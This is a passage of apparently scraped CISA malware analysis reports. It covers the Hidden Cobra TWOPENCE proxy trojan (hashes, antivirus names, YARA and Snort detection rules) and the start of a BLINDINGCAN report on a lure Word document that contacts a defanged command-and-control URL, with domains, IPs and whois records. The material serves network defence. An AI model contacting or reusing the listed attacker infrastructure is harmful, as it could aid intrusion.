       SHA256_5 = “8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1”
   strings:
       $cmd1 = “ssylka”
       $cmd2 = “ustanavlivat”
       $cmd3 = “poluchit”
       $cmd4 = “pereslat”
       $cmd5 = “derzhat”
       $cmd6 = “vykhodit”
       $cmd7 = “Nachalo”
       $cmd8 = “kliyent2podklyuchit”
       $frmt1 = “Host: %s%s%s:%hu”
       $frmt2 = “%s%s%s%s%s%s%s%s%s%s”
   condition:
       (4 of ($cmd*)) and (1 of ($frmt*))
}

ssdeep Matches

99
9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852

PE Metadata

Compile Date
2016-09-18 23:24:39-04:00

Import Hash
6b8fa355d78d649f199232a25e22d630

PE Sections

MD5
Name
Raw Size
Entropy

41a5273e6d92dfe9de72f76c18f6475f
header
1024
2.398805

e6412e7fb561ead2b3eddef9bafd3518
.text
198656
6.554337

a9890fd54b24cf53425649a92fe290ad
.rdata
18432
5.115959

884e0d48d1830995eeade874d295ced0
.data
5632
3.201975

0e79f25ba5ec9ae1502fe80ec7b08f79
.reloc
9216
5.674607

Packers/Compilers/Cryptors

Microsoft Visual C++ ?.?

Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de

Tags

HIDDEN-COBRAproxytrojan

Details

Name
f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de

Size
265216 bytes

Type
PE32+ executable (GUI) x86-64, for MS Windows

MD5
bda82f0d9e2cb7996d2eefdd1e5b41c4

SHA1
9ff715209d99d2e74e64f9db894c114a8d13229a

SHA256
f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de

SHA512
6774cc49f5200d1a427b5a2af77d27eaac671f405e01f3ded2d152e5e08d1217d2b3b9d8508d2924aee5f0925abc32f83645756cf248222193eb13194eb39add

ssdeep
6144:+TW3SZ4GvcPPWi9JhJTxPm26ebMk5Q35m8LERov:invQThJsexib

Entropy
6.304640

Antivirus

Ahnlab
Trojan/Win32.Alreay

Antiy
Trojan[Banker]/Win32.Alreay

Avira
TR/AD.APTLazerus.dsenf

BitDefender
Gen:Variant.Razy.368693

ClamAV
Win.Trojan.Agent-6971031-0

Comodo
Malware

Cyren
W64/Alreay.C

ESET
a variant of Win64/NukeSped.BB trojan

Emsisoft
Gen:Variant.Razy.368693 (B)

Ikarus
Trojan.Win64.Nukesped

K7
Trojan ( 00538e2b1 )

Lavasoft
Gen:Variant.Razy.368693

McAfee
PWS-Banker.gen.gj

Symantec
Trojan.Gen.6

Systweak
trojan.banker

TrendMicro
BKDR64_.8979788A

TrendMicro House Call
BKDR64_.8979788A

VirusBlokAda
TrojanBanker.Alreay

Zillya!
Trojan.GenericKD.Win32.133035

YARA Rules

rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
{
   meta:
       Author = “CISA Trusted Third Party”
       Incident = “10301706.r2.v1”
       Date = “2020-08-11”
       Actor = “Hidden Cobra”
       Category = “Backdoor Dropper Proxy Spyware Trojan”
       Family = “TWOPENCE”
       Description = “Detects strings in TWOPENCE proxy tool”
       MD5_1 = “40e698f961eb796728a57ddf81f52b9a”
       SHA256_1 = “a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118”
       MD5_2 = “dfd09e91b7f86a984f8687ed6033af9d”
       SHA256_2 = “aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83”
       MD5_3 = “bda82f0d9e2cb7996d2eefdd1e5b41c4”
       SHA256_3 = “f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de”
       MD5_4 = “97aaf130cfa251e5207ea74b2558293d”
       SHA256_4 = “9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852”
       MD5_5 = “889e320cf66520485e1a0475107d7419”
       SHA256_5 = “8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1”
   strings:
       $cmd1 = “ssylka”
       $cmd2 = “ustanavlivat”
       $cmd3 = “poluchit”
       $cmd4 = “pereslat”
       $cmd5 = “derzhat”
       $cmd6 = “vykhodit”
       $cmd7 = “Nachalo”
       $cmd8 = “kliyent2podklyuchit”
       $frmt1 = “Host: %s%s%s:%hu”
       $frmt2 = “%s%s%s%s%s%s%s%s%s%s”
   condition:
       (4 of ($cmd*)) and (1 of ($frmt*))
}

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2016-05-01 23:24:39-04:00

Import Hash
b2b084698f33fd93bc9e72f0c2af26b5

PE Sections

MD5
Name
Raw Size
Entropy

379ffb6e4aeb96c753dbe1f16dae01db
header
1024
2.516799

33c1647f8f3a870e4c8f9b48b5ec2c82
.text
212480
6.373885

5bb6bf3a50e4982066d5746d99945853
.rdata
31232
5.302106

a62c434f5beb6282b437c5e0dc40c616
.data
7168
2.877953

6ba7963edd09a132976d6830462fc17f
.pdata
11776
5.348074

06ce263d0dc81197b88ff3f576787648
.reloc
1536
2.915027

Packers/Compilers/Cryptors

Microsoft Visual C++ 8.0 (DLL)

Description

This file is a 64-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852

Tags

HIDDEN-COBRAproxyspywaretrojan

Details

Name
9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852

Size
232960 bytes

Type
PE32 executable (GUI) Intel 80386, for MS Windows

MD5
97aaf130cfa251e5207ea74b2558293d

SHA1
c7e7dd96fefca77bb1097aeeefef126d597126bd

SHA256
9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852

SHA512
d8b750263ac8b295a934ef60a694108257c489055c6aee24bae000d70d0bdde70934e8c2a157d38c15469bc5fb2a6cfcb733ddd4729ba05200dfa243913cf73d

ssdeep
3072:6U5r72JE+FYWR0jZLShk4cPT/QzSaQ0sCFneZTznIhZJJcrJ1GHeV9:6U5uJpYnZL05STQNddFnAnGZIrV

Entropy
6.524151

Antivirus

Ahnlab
Trojan/Win32.Alreay

Antiy
Trojan[Banker]/Win32.Alreay

BitDefender
Trojan.Generic.22528938

ClamAV
Win.Trojan.Agent-6971031-0

Comodo
Malware

Cyren
W32/Alreay.SQQX-6406

ESET
a variant of Win32/Spy.Banker.ADRO trojan

Emsisoft
Trojan.Generic.22528938 (B)

Ikarus
Trojan-Spy.Agent

K7
Spyware ( 005198041 )

Lavasoft
Trojan.Generic.22528938

McAfee
GenericRXFQ-MX!97AAF130CFA2

Microsoft Security Essentials
Trojan:Win32/Alreay

NANOAV
Trojan.Win32.Alreay.ettzed

NetGate
Trojan.Win32.Malware

Sophos
Troj/Banker-GUU

Symantec
Trojan.Gen.2

TrendMicro
Trojan.79245AFC

TrendMicro House Call
Trojan.79245AFC

VirusBlokAda
TrojanBanker.Alreay

Zillya!
Trojan.Alreay.Win32.42

YARA Rules

rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
{
   meta:
       Author = “CISA Trusted Third Party”
       Incident = “10301706.r2.v1”
       Date = “2020-08-11”
       Actor = “Hidden Cobra”
       Category = “Backdoor Dropper Proxy Spyware Trojan”
       Family = “TWOPENCE”
       Description = “Detects strings in TWOPENCE proxy tool”
       MD5_1 = “40e698f961eb796728a57ddf81f52b9a”
       SHA256_1 = “a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118”
       MD5_2 = “dfd09e91b7f86a984f8687ed6033af9d”
       SHA256_2 = “aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83”
       MD5_3 = “bda82f0d9e2cb7996d2eefdd1e5b41c4”
       SHA256_3 = “f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de”
       MD5_4 = “97aaf130cfa251e5207ea74b2558293d”
       SHA256_4 = “9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852”
       MD5_5 = “889e320cf66520485e1a0475107d7419”
       SHA256_5 = “8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1”
   strings:
       $cmd1 = “ssylka”
       $cmd2 = “ustanavlivat”
       $cmd3 = “poluchit”
       $cmd4 = “pereslat”
       $cmd5 = “derzhat”
       $cmd6 = “vykhodit”
       $cmd7 = “Nachalo”
       $cmd8 = “kliyent2podklyuchit”
       $frmt1 = “Host: %s%s%s:%hu”
       $frmt2 = “%s%s%s%s%s%s%s%s%s%s”
   condition:
       (4 of ($cmd*)) and (1 of ($frmt*))
}

ssdeep Matches

99
aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83

PE Metadata

Compile Date
2017-02-20 06:09:30-05:00

Import Hash
6b8fa355d78d649f199232a25e22d630

PE Sections

MD5
Name
Raw Size
Entropy

bb573973d723ebac15a2dd783a56921f
header
1024
2.372576

e6412e7fb561ead2b3eddef9bafd3518
.text
198656
6.554337

a9890fd54b24cf53425649a92fe290ad
.rdata
18432
5.115959

884e0d48d1830995eeade874d295ced0
.data
5632
3.201975

0e79f25ba5ec9ae1502fe80ec7b08f79
.reloc
9216
5.674607

Packers/Compilers/Cryptors

Microsoft Visual C++ ?.?

Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38

Tags

HIDDEN-COBRAbackdoorproxytrojan

Details

Name
70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38

Size
1637888 bytes

Type
PE32 executable (GUI) Intel 80386, for MS Windows

MD5
3c9e71400b72cc0213c9c3e4ab4df9df

SHA1
bdb632b27ddb200693c1b0b80819a7463d4e7a98

SHA256
70b494b0a8fdf054926829dcb3235fc7bd0346b6a19faf2a57891c71043b3b38

SHA512
c7a02fadb9fbbe0cf05dddd6a78cbf48b9030638420b421b4ff83816ae1cabbe54656b4e1c8e4020cacab93388934b6c79d3d21fe560ed4c7131ad5eba481ed0

ssdeep
24576:5gDgaE2r55ENJSOZ8jsAMZMF2kPupVevS6ieT17cZ/hJMIYO0:+D9vrrs8OZxZI+wvTTahqO

Entropy
7.956784

Antivirus

Ahnlab
Trojan/Win32.Agent

Antiy
Trojan/Win32.AGeneric

Avira
TR/Crypt.TPM.Gen

BitDefender
Gen:Variant.Symmi.79278

Comodo
Malware

ESET
Win32/Spy.Banker.AECT trojan

Emsisoft
Gen:Variant.Symmi.79278 (B)

K7
Trojan ( 0040f4ef1 )

Lavasoft
Gen:Variant.Symmi.79278

McAfee
Generic Trojan.ej

Microsoft Security Essentials
TrojanSpy:Win32/Banker

NANOAV
Trojan.Win32.TPM.etiucd

Quick Heal
Trojan.Generic

Sophos
Troj/Agent-AXNK

Symantec
Trojan.Gen.2

TrendMicro
BKDR_KL.22A80489

TrendMicro House Call
BKDR_KL.22A80489

VirusBlokAda
Backdoor.Agent

Zillya!
Backdoor.Agent.Win32.64626

YARA Rules

No matches found.

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2017-02-20 06:09:30-05:00

Import Hash
baa93d47220682c04d92f7797d9224ce

PE Sections

MD5
Name
Raw Size
Entropy

a32e7b28831808e208355ae637e006f0
header
4096
0.814733

ca42a315c5287101ffdf2d7843b74d34
 
119296
7.972251

d41d8cd98f00b204e9800998ecf8427e
.rsrc
0
0.000000

9e66a842d63673e7febfc6646ea43c43
.idata
512
1.308723

5668c4714f706c7f669afb1e7f9c6ba7
 
512
0.260771

de90eb0d146d89f2c2dd76ecf17ea09e
dworqjxn
1512960
7.955321

4857cc05e1ea968cfc978d53f2f34126
omrcmqfn
512
3.378388

Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1

Tags

HIDDEN-COBRAproxyspywaretrojan

Details

Name
8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1

Size
480768 bytes

Type
PE32+ executable (DLL) (GUI) x86-64, for MS Windows

MD5
889e320cf66520485e1a0475107d7419

SHA1
f5fc9d893ae99f97e43adcef49801782daced2d7

SHA256
8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1

SHA512
8da0ab0b3072b3966c5e32c22e7ac5654ff3923b3cf28cc895ae10d520a27bb70360e4d94e54422033aa7c7527d10774ab6d8b8569bab8b6909eb3eab40d62bc

ssdeep
6144:sdqAqUok+00rm9TOi9Vc7/VtXvWLnJlh+efvoRKmjbL/xY4fTKKWSFle3IDgDi2C:xABogwttXuLnJlkkiKU/xtKYydF9iIU

Entropy
6.465490

Antivirus

Ahnlab
Trojan/Win32.Alreay

Antiy
Trojan/Win32.BTSGeneric

Avira
TR/Spy.Banker.xbkax

BitDefender
Trojan.Generic.20466258

ClamAV
Win.Trojan.Agent-6971031-0

Comodo
Malware

ESET
a variant of Win64/Spy.Banker.AX trojan

Emsisoft
Trojan.Generic.20466258 (B)

Ikarus
Trojan-Spy.Win64.Agent

K7
Spyware ( 00504e561 )

Lavasoft
Trojan.Generic.20466258

McAfee
Trojan-FLEP!889E320CF665

Microsoft Security Essentials
TrojanSpy:Win64/Cyruslish.A

NANOAV
Trojan.Win64.Alreay.elwnmb

Sophos
Troj/Banker-GSY

Symantec
Trojan.Gen.2

TrendMicro
BKDR64_.D1FB2862

TrendMicro House Call
BKDR64_.D1FB2862

VirusBlokAda
TrojanBanker.Alreay

Zillya!
Trojan.Banker.Win64.148

YARA Rules

rule CISA_3P_10301706_02 : HiddenCobra TWOPENCE backdoor dropper proxy spyware trojan
{
   meta:
       Author = “CISA Trusted Third Party”
       Incident = “10301706.r2.v1”
       Date = “2020-08-11”
       Actor = “Hidden Cobra”
       Category = “Backdoor Dropper Proxy Spyware Trojan”
       Family = “TWOPENCE”
       Description = “Detects strings in TWOPENCE proxy tool”
       MD5_1 = “40e698f961eb796728a57ddf81f52b9a”
       SHA256_1 = “a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118”
       MD5_2 = “dfd09e91b7f86a984f8687ed6033af9d”
       SHA256_2 = “aca598e2c619424077ef8043cb4284729045d296ce95414c83ed70985c892c83”
       MD5_3 = “bda82f0d9e2cb7996d2eefdd1e5b41c4”
       SHA256_3 = “f3ca8f15ca582dd486bd78fd57c2f4d7b958163542561606bebd250c827022de”
       MD5_4 = “97aaf130cfa251e5207ea74b2558293d”
       SHA256_4 = “9a776b895e93926e2a758c09e341accb9333edc1243d216a5e53f47c6043c852”
       MD5_5 = “889e320cf66520485e1a0475107d7419”
       SHA256_5 = “8cad61422d032119219f465331308c5a61e21c9a3a431b88e1f8b25129b7e2a1”
   strings:
       $cmd1 = “ssylka”
       $cmd2 = “ustanavlivat”
       $cmd3 = “poluchit”
       $cmd4 = “pereslat”
       $cmd5 = “derzhat”
       $cmd6 = “vykhodit”
       $cmd7 = “Nachalo”
       $cmd8 = “kliyent2podklyuchit”
       $frmt1 = “Host: %s%s%s:%hu”
       $frmt2 = “%s%s%s%s%s%s%s%s%s%s”
   condition:
       (4 of ($cmd*)) and (1 of ($frmt*))
}

ssdeep Matches

No matches found.

PE Metadata

Compile Date
2016-08-26 00:11:49-04:00

Import Hash
1cd9192feb9402723bdada868b8c98de

PE Sections

MD5
Name
Raw Size
Entropy

2fb3e4c0734998f9629ba86c4e7c6e99
header
1024
2.603055

9319545c7ac53b81b3d56a722dad8ef1
.text
364032
6.423307

e406c9d4f3bdbdbab8191bb701e4ff57
.rdata
81920
6.056842

6198d24ba115f17c5597e2773cb51a75
.data
8704
3.090138

f7b6096db3b9ad55c3bad4c47de6d5b4
.pdata
22016
5.758547

ddf5f86578d6de91c211211bdd72f63f
.reloc
3072
3.181451

Description

This file is a 32-bit Windows executable. It has similar functionality as a917c1cc198cf36c0f2f6c24652e5c2e94e28d963b128d54f00144d216b2d118.

Mitigation

The following Snort rules were provided by a CISA trusted third party:

// The following Snort rule can be used to detect proxy handshake
alert tcp any any -> any any (msg:”Proxy handshake detected”; content:”|a7 00 a7 00 fb 00 b0 00 8e 00 c5 00 b0 00 48 00 17 00 c5 00 8b 00 6a 00 8e 00 ec 00 f3 00 fe 00 d9 00 f3 00 a7 00 6a 00 ec 00 a7 00 b0 00 17 00 fc 00 48 00 48 00 09 00 09 00 09 00 48 00 8e 00 ce|”; rev:1; sid:1;)

// The following Snort rule can be used to detect encrypted proxy string kliyent2podklyuchit
alert tcp any any -> any any (msg:”Proxy string detected”; content:”|d1 14 23 b3 c7 b2 ac fe 70 0d 1c d1 14 b3 d7 f9 38 23 ac|”; rev:1; sid:1;)

// The following Snort rule can be used to detect encrypted proxy string poluchit
alert tcp any any -> any any (msg:”Proxy string detected”; content:”|70 0d 14 d7 f9 38 23 ac|”; rev:1; sid:1;)

// The following Snort rule can be used to detect encrypted proxy string pereslat
alert tcp any any -> any any (msg:”Proxy string detected”; content:”|70 c7 be c7 c9 14 ab ac|”; rev:1; sid:1;)

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

Maintain up-to-date antivirus signatures and engines.
Keep operating system patches up-to-date.
Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
Enforce a strong password policy and implement regular password changes.
Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
Disable unnecessary services on agency workstations and servers.
Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
Scan all software downloaded from the Internet prior to executing.
Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

1-888-282-0870

CISA Service Desk (UNCLASS)

CISA SIPR (SIPRNET)

CISA IC (JWICS)

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://www.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

Web: https://malware.us-cert.gov

E-Mail: submit@malware.us-cert.gov

FTP: ftp.malware.us-cert.gov (anonymous)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 20, 2020The Homeland Security Systems Engineering and Development Institute, sponsored by the Department of Homeland Security and operated by MITRE, has released the 2020 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses list. The Top 25 uses data from the National Vulnerability Database (NVD) to compile the most frequent and critical errors that can lead to serious vulnerabilities in software. An attacker can often exploit these vulnerabilities to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Top 25 list and evaluate recommended mitigations to determine those most suitable to adopt.

This product is provided subject to this Notification and this Privacy & Use policy.

Original release date: August 19, 2020

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts between Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI). Working with U.S. Government partners, DHS and FBI identified Remote Access Trojan (RAT) malware variants used by the North Korean government. This malware variant has been identified as BLINDINGCAN. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.

FBI has high confidence that HIDDEN COBRA actors are using malware variants in conjunction with proxy servers to maintain a presence on victim networks and to further network exploitation. A threat group with a nexus to North Korea targeted government contractors early this year to gather intelligence surrounding key military and energy technologies. The malicious documents employed in this campaign used job postings from leading defense contractors as lures and installed a data gathering implant on a victim’s system. This campaign utilized compromised infrastructure from multiple countries to host its command and control (C2) infrastructure and distribute implants to a victim’s system. CISA and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.

This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware and report the activity to CISA or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation. The threat actor whose activity is described in this report may have included images of logos and products, such as the examples in this report, as a part of a social engineering strategy.

CISA received four Microsoft Word Open Extensible Markup Language (XML) documents (.docx), two Dynamic-Link Libraries (DLLs). The .docx files attempt to connect to external domains for a download. A 32-bit and a 64-bit DLL was submitted that install a 32-bit and a 64-bit DLL named “iconcache.db” respectively. The DLL “iconcache.db” unpacks and executes a variant of Hidden Cobra RAT. It contains built-in functions for remote operations that provide various capabilities on a victim’s system.

For a downloadable copy of IOCs, see MAR-10295134-1.v1.stix.

Submitted Files (6)

0fc12e03ee93d19003b2dd7117a66a3da03bd6177ac6eb396ed52a40be913db6 (0FC12E03EE93D19003B2DD7117A66A…)

158ddb85611b4784b6f5ca7181936b86eb0ec9a3c67562b1d57badd7b7ec2d17 (2_7955fa7ab32773d17e0e94efeea6…)

586d012540ed1244572906e3733a0cb4bba90a320da82f853e5dfac82c5c663e (1_6cea7290883f0527dbd3e2df6446…)

6a3446b8a47f0ab4f536015218b22653fff8b18c595fbc5b0c09d857eba7c7a1 (4_e7aa0237fc3db67a96ebd877806a…)

7933716892e0d6053057f5f2df0ccadf5b06dc739fea79ee533dd0cec98ca971 (3_56470e113479eacda081c2eeead1…)

d40ad4cd39350d718e189adf45703eb3a3935a7cf8062c20c663bc14d28f78c9 (D40AD4CD39350D718E189ADF45703E…)

Additional Files (6)

58027c80c6502327863ddca28c31d352e5707f5903340b9e6ccc0997fcb9631d (58027c80c6502327863ddca28c31d3…)

7d507281e2e21476ff1af492ad9f574b14cbf77eb4cda9b67e4256318c7c6bbd (7d507281e2e21476ff1af492ad9f57…)

8b53b519623b56ab746fdaf14d3eb402e6fa515cde2113a07f5a3b4050e98050 (8b53b519623b56ab746fdaf14d3eb4…)

b70e66d387e42f5f04b69b9eb15306036702ab8a50b16f5403289b5388292db9 (iconcache.db)

bdfd16dc53f5c63da0b68df71c6e61bad300e59fd5748991a6b6a3650f01f9a1 (e7718609577c6e34221b03de7e959a…)

d5186efd8502a3a99a66729cb847d3f4be8937a3fec1c2655b6ea81f57a314f5 (iconcache.db)

Domains (4)

agarwalpropertyconsultants.com

anca-aste.it

automercado.co.cr

curiofirenze.com

IPs (4)

192.99.20.39

199.79.63.24

51.68.152.96

54.241.91.49

Findings

586d012540ed1244572906e3733a0cb4bba90a320da82f853e5dfac82c5c663e

Tags

downloadertrojan

Details

Name
1_6cea7290883f0527dbd3e2df64462684.8d179113e963d81adbf8d39ceff456afac3dae16.docx

Size
184853 bytes

Type
Microsoft Word 2007+

MD5
6cea7290883f0527dbd3e2df64462684

SHA1
8d179113e963d81adbf8d39ceff456afac3dae16

SHA256
586d012540ed1244572906e3733a0cb4bba90a320da82f853e5dfac82c5c663e

SHA512
6d84696445a9339709edc25dfaa36766bcbc1a63aa41386280307a6314c9838a1fb347785becb91346ac9ed8fffe3804e01910e69945c6f41c15a06591213643

ssdeep
3072:3wlGjFU9aU5M3Dr+YLLUb6WaTllr+YLLUb6WaTlmv13yK8RZOphF:3wl9aUOfJnUjaTltJnUjaTlmv178RyF

Entropy
6.246619

Antivirus

NANOAV
Exploit.Xml.CVE-2017-0199.equmby

YARA Rules

No matches found.

ssdeep Matches

97
6a3446b8a47f0ab4f536015218b22653fff8b18c595fbc5b0c09d857eba7c7a1

Relationships

586d012540…
Connected_To
agarwalpropertyconsultants.com

Description

This file is a .docx file that is a zipped file containing XML files in a directory structure.

Once opened in an application capable of displaying .docx files, the XML file “1_6cea7290883f0527dbd3e2df64462684.8d179113e963d81adbf8d39ceff456afac3dae16.docx/word/_rels/settings.xml.rels” attempts to connect to the following Uniform Resource Locator (URL) for a download:

–Begin External URL–
hxxps[:]//agarwalpropertyconsultants.com/assets/form/template/img/boeing_ia_cm.jpg
–End External URL–

The download was not available at the time of analysis.

Screenshots

Figure 1 – Screenshot of “1_6cea7290883f0527dbd3e2df64462684.8d179113e963d81adbf8d39ceff456afac3dae16.docx”.

agarwalpropertyconsultants.com

Tags

command-and-control

URLs

hxxps[:]//agarwalpropertyconsultants.com/assets/form/template/img/boeing_ia_cm.jpg

Ports

443 TCP

Whois

Domain Name: AGARWALPROPERTYCONSULTANTS.COM
Registry Domain ID: 2430104516_DOMAIN_COM-VRSN
Registrar WHOIS Server: Whois.bigrock.com
Registrar URL: www.bigrock.com
Updated Date: 2019-11-05T02:16:36Z
Creation Date: 2019-09-05T06:07:18Z
Registrar Registration Expiration Date: 2020-09-05T06:07:18Z
Registrar: BigRock Solutions Ltd
Registrar IANA ID: 1495
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant City: Mumbai
Registrant State/Province: Other
Registrant Postal Code: 400102
Registrant Country: IN
Registry Admin ID: Not Available From Registry
Admin City: Mumbai
Admin State/Province: Other
Admin Postal Code: 400102
Admin Country: IN
Registry Tech ID: Not Available From Registry
Tech City: Mumbai
Tech State/Province: Other
Tech Postal Code: 400102
Tech Country: IN
Tech Phone: +91.9821112012
Name Server: ns1.bh-58.webhostbox.net
Name Server: ns2.bh-58.webhostbox.net
DNSSEC: Unsigned
Registrar Abuse Contact Email: abuse@bigrock.com
Registrar Abuse Contact Phone: +1-415-349-0015
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2020-06-30T20:21:25Z <<<

Relationships

agarwalpropertyconsultants.com
Connected_From
586d012540ed1244572906e3733a0cb4bba90a320da82f853e5dfac82c5c663e

agarwalpropertyconsultants.com
Resolved_To
199.79.63.24

Description

“1_6cea7290883f0527dbd3e2df64462684.8d179113e963d81adbf8d39ceff456afac3dae16.docx” attempts to connect to this domain.

199.79.63.24

Whois

Queried whois.arin.net with “n 199.79.63.24″…

NetRange: 199.79.62.0 – 199.79.63.255
CIDR: 199.79.62.0/23
NetName: PUBLICDOMAINREGISTRY-NETWORKS
NetHandle: NET-199-79-62-0-1
Parent: NET199 (NET-199-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS394695
Organization: PDR (PSUL-1)
RegDate: 2012-01-13
Updated: 2018-11-29
Ref: https://rdap.arin.net/registry/ip/199.79.62.0

OrgName: PDR
OrgId: PSUL-1
Address: P.D.R Solutions LLC, 10, Corporate Drive, Suite 300
City: Burlington
StateProv: MA
PostalCode: 01803
Country: US
RegDate: 2015-08-04
Updated: 2019-11-07
Ref: https://rdap.arin.net/registry/entity/PSUL-1

OrgAbuseHandle: ABUSE5185-ARIN
OrgAbuseName: Abuse Admin
OrgAbusePhone: +1-415-230-0648
OrgAbuseEmail: abuse@publicdomainregistry.com
OrgAbuseRef: https://rdap.arin.net/registry/entity/ABUSE5185-ARIN

OrgNOCHandle: NOC32406-ARIN
OrgNOCName: NOC
OrgNOCPhone: +1-415-230-0680
OrgNOCEmail: noc@publicdomainregistry.com
OrgNOCRef: https://rdap.arin.net/registry/entity/NOC32406-ARIN

OrgTechHandle: TECH953-ARIN
OrgTechName: Tech
OrgTechPhone: +1-415-230-0680
OrgTechEmail: ipadmin@publicdomainregistry.com
OrgTechRef: https://rdap.arin.net/registry/entity/TECH953-ARIN

OrgRoutingHandle: EIGAR-ARIN
OrgRoutingName: eig-arin
OrgRoutingPhone: +1-781-852-3200
OrgRoutingEmail: eig-net-team@endurance.com
OrgRoutingRef: https://rdap.arin.net/registry/entity/EIGAR-ARIN

OrgNOCHandle: EIGAR-ARIN
OrgNOCName: eig-arin
OrgNOCPhone: +1-781-852-3200
OrgNOCEmail: eig-net-team@endurance.com
OrgNOCRef: https://rdap.arin.net/registry/entity/EIGAR-ARIN

OrgDNSHandle: EIGAR-ARIN
OrgDNSName: eig-arin
OrgDNSPhone: +1-781-852-3200
OrgDNSEmail: eig-net-team@endurance.com
OrgDNSRef: https://rdap.arin.net/registry/entity/EIGAR-ARIN

OrgTechHandle: EIGAR-ARIN
OrgTechName: eig-arin
OrgTechPhone: +1-781-852-3200
OrgTechEmail: eig-net-team@endurance.com
